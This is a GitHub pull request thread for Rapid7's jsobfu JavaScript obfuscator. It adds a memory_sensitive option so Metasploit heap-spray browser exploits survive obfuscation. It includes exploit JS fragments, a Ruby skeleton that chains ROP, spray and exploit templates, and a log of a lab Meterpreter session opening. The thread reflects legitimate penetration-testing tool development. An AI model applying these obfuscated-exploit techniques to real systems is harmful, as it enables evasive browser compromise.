### PR TITLE
Add :memory_sensitive and #set_code

### PR DESCRIPTION
**Pull request by joevennix**
Fixes issue #8.

Adds some new features and updates the README.

#### Verification
- [ ] Read through README changes
- [ ] try out new features in the commandline, as the README prescribes
- [ ] Build and release version 0.3.0 on to rubygems

### CODE REVIEW

File: samples/basic.rb [hunk 1]
```diff
@@ -23,4 +23,4 @@
   };
 |
 
-puts JSObfu.new(source).obfuscate
+puts JSObfu.new('var me = "BAR"; var description = "FOO" + me;').obfuscate(memory_sensitive: true)
```
Comment (jlee-r7) [inline samples/basic.rb]: `source` is now unused in this file.

Comment (joevennix) [inline samples/basic.rb]: Oops. Good catch. I did not mean to check that in.

**Comment by jvazquez-r7** [comment]
Thanks @joevennix will work on it tomorrow!

**Comment by jvazquez-r7** [comment]
@joevennix I've tried to use the updated gem on https://github.com/rapid7/metasploit-framework/pull/4726

Scope and memory_sensitive
---------------

* I've tried to use memory_sensitive and scope on this branch: https://github.com/jvazquez-r7/metasploit-framework/tree/jsobfu_edb_35948

Unfortunately it's not working on my tests. Maybe I'm using it bad:

* I tried to use several scopes like that: https://github.com/jvazquez-r7/metasploit-framework/commit/845a7b77ee0095034828ce9d82b3af90ff747cce#diff-89f10ff15d958f41abef1e3e6cf4817eR176 , not sure if that merge should work, otherwise looks tricky to use several scopes when generating a new JS obfuscated.
* I did an ugly gsub on ```main_template```... weird haha, ERB did an error and I took the easy path to test... anyway I was able test that part successfully, so I guess you can forget this ugly code :P 

only memory_sensitive
---------

I've tried to use just memory_sensitive here:

https://github.com/jvazquez-r7/metasploit-framework/tree/memory_sensitive_edb_35948

Unfortunately the old spray doesn't work still, I can try to search if there is a reliable address this time hehe but I got lazy xD Ideally I'd love to not having to re-debug things after obfuscation because... I'm lazy xD if you think memory_sensitive is really working, feel free to ask me to search for a reliable address after obfuscating again and I'll give a new chance.

**Comment by joevennix** [comment]
You shouldn't need to ever call `merge` on `JSObfu::Scope`. The updates to the README explain how to reuse a scope: https://github.com/rapid7/jsobfu/pull/9/files#diff-04c6e90faac2675aa89e2176d2eec7d8R82

I'm not sure why the `:memory_sensitive` option would fail - it should get rid of any extra String lookups/transformations, and var renaming shouldn't make a difference. I'll take a look at your specific case in a moment.

**Comment by joevennix** [comment]
For that branch, it would be easiest to keep a `@jsobfu` ivar, and then obfuscate via `@jsobfu.code = ...; @jsobfu.obfuscate`

This will preserve var renames across calls to `obfuscate`.

**Comment by joevennix** [comment]
Ah, I missed a transformation method somewhere. String literals are still transformed when `memory_sensitive` is enabled:

    # in my obfuscated exploit.js:
    Exploit.prototype.dword2str=function(G){var M="";for(var h=0;h<4;h++){M+=String.fromCharCode((G>>8*h)&255);}return M;};

Looking into this

**Comment by joevennix** [comment]
Er nvm, that is part of the original source actually:

    // dword to little endian string
    Exploit.prototype.dword2str = function(dword) {
        var str = "";
        for (var n=0; n < 4; n++){
            str += String.fromCharCode((dword >> 8 * n) & 0xff);
        }
        return str;
    };

Hrm. I'm not sure why this would muck up your memory layout then.

**Comment by joevennix** [comment]
@jvazquez-r7 ahh I see. You are using the option wrong. Pass `memory_sensitive: true` to the `obfuscate`, method of the `JSObfu` instance, *not* to the constructor itself.

**Comment by joevennix** [comment]
Yeah sorry that is very confusing, seeing as I named the Issue "JSObfu should have more constructor options". I figured reusing the instance is easier than creating a new `JSObfu` instance every time you want to inject more code.

**Comment by jvazquez-r7** [comment]
@joevennix damnit.... gimme 10 mins to retry! finishing work on another thing and will retry :( thanks for noticing!!! I'm bad using new API's apparently, sorry :(

**Comment by jvazquez-r7** [comment]
@I'm going to try to use just one instance of jsobfu and addking js code there, and then obfuscate with memory_sensitive: true :)

**Comment by joevennix** [comment]
Okay. BTW you can probably get away with only using `memory_sensitive: true` on the heap spray script, and full obfuscation for the rest.

**Comment by jvazquez-r7** [comment]
:memory_sensitive working okey now: 

```
] 172.16.158.131   x360_video_player_set_text_bof - Request: /pQo6I6Fj1qSuKzU/HVHmCr/js/sprayer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending sprayer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /pQo6I6Fj1qSuKzU/HVHmCr/js/informer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending informer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /pQo6I6Fj1qSuKzU/HVHmCr/js/rop_builder.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending rop_builder.js...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49348) at 2015-02-11 13:59:25 -0600
[*] Session ID 1 (172.16.158.1:4444 -> 172.16.158.131:49348) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2216)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2168
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /pQo6I6Fj1qSuKzU/HVHmCr/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[*] Sending stage (770048 bytes) to 172.16.158.131
[+] Successfully migrated to process
```

:D

branch updated: https://github.com/jvazquez-r7/metasploit-framework/tree/memory_sensitive_edb_35948

Now, let me try to use just one instance of jsobfu hahaha I'm super dummy, sorry :D  

I should be able to keep doing @js.code << new_js right?... trying!

**Comment by joevennix** [comment]
\O/

> I should be able to keep doing @js.code << new_js right?... trying!

You can, but some of your code will be obfuscated multiple times. I'm honestly not sure what exactly will happen, I have never tried `<<` and multiple `obfuscate` calls.

**Comment by jvazquez-r7** [comment]
haha I want to do something like that:

```
    js = ::Rex::Exploitation::JSObfu.new('')
    js << rop_builder_template
    js << informer_template
    js << sprayer_template
    js << exploit_template(cli, target_info)

    js.obfuscate(memory_sensitive: true)

    exploit_call_js = ::Rex::Exploitation::JSObfu.new(
      'var e = new Exploit(); e.run();',
      scope: js.scope
    )

    exploit_call_js.obfuscate
```

So instead of the original html I use:

```

    template = <<-EOF
<!DOCTYPE html>
<html>
<head>
    <script src="js/#{rand_text_alpha(5 + 3)}.js"></script>
</head>
<body onload="<%=exploit_call%>">
</body>
</html>
    EOF
    renderer = ERB.new(template)

```

It should allow to write the exploit easily still :) and then get obfuscation easy for all the JS, should work? I'm trying hehe

**Comment by joevennix** [comment]
No need for the empty string passed to `JSObfu.new`, its defaults to `''`.

That should work fine. Although perhaps you only want `memory_sensitive: true` to be used with `sprayer_template`.

**Comment by jvazquez-r7** [comment]
This branch works as expected: https://github.com/jvazquez-r7/metasploit-framework/tree/jsobfu_edb_35948 :D 

I really like this way because allows me to develop exploits independently from the ruby and the framework, and then merge all the JS code and get it with just one call when exploiting. 

but yeah, I need to use memory_sensitive for all the code in this way..... oka one second, let me try in another way....

**Comment by jvazquez-r7** [comment]
btw, I'm learning sorry, obviously this pull request works, sorry for annoying @joevennix !

I'll ask with @jlee-r7  to publish the gem :) thanks a lot for your help, as usual!

**Comment by joevennix** [comment]
@jvazquez-r7, that seems like a legitimate use case, maybe a new `#append!` method would be helpful. If anything it should be easy to build the new method from the code I have added here though. Glad I could help :)

**Comment by joevennix** [comment]
Actually a better idea would probably be a `jshint` style comment in the source itself:

        /* jsobfu:memory_sensitive=true */
        for (blah blah blah) heapSprayBlah()
        /* jsobfu:memory_sensitive=false */

That way you'd never have to deal with passing different options to `obfuscate:` in different parts of the code.

**Comment by jvazquez-r7** [comment]
^^^ it would rock indeed!

**Comment by joevennix** [comment]
Opened https://github.com/rapid7/jsobfu/issues/10 to track this idea. It should be easy to implement, just hook the comment callback in our Obfuscation visitor, parse the comment, and use it to turn on/off certain ivars.

**Comment by jvazquez-r7** [comment]
@joevennix in the meanwhile: https://github.com/jvazquez-r7/metasploit-framework/commit/cd1a0cb87ea1f7fd1fa0911fed0e6c002ec1975c

^^^ Do you think there is an easier way to make it or looks good :? Just in case I'm forgetting some feature :S

**Comment by jvazquez-r7** [comment]
btw @joevennix I'm holding up it because I'm awaiting for some feedback about what is the preferred procedure to publish the gem, but this PR looks good on my side. Maybe on the exploit for edb_35948  I'll let jsobfu:memory_sensitive= true because it's working better with staged payloads for some reason which is obscure to me still :P I don't discard the memory being too corrupted while exploitation neither.... so I don't want to blame jsobfu at all :-) who is playing super nicely now!

**Comment by joevennix** [comment]
@jvazquez-r7 that looks good yep. it's possible that string transformations that occur after the heap spray are screwing you up later. This kind of thing would be much easier to debug with the jshint-style commentry.

**Comment by jvazquez-r7** [comment]
Okey I'm ready to land it and publish the new gem version I think! Hope to not waste nothing! :P

**Pull request merged**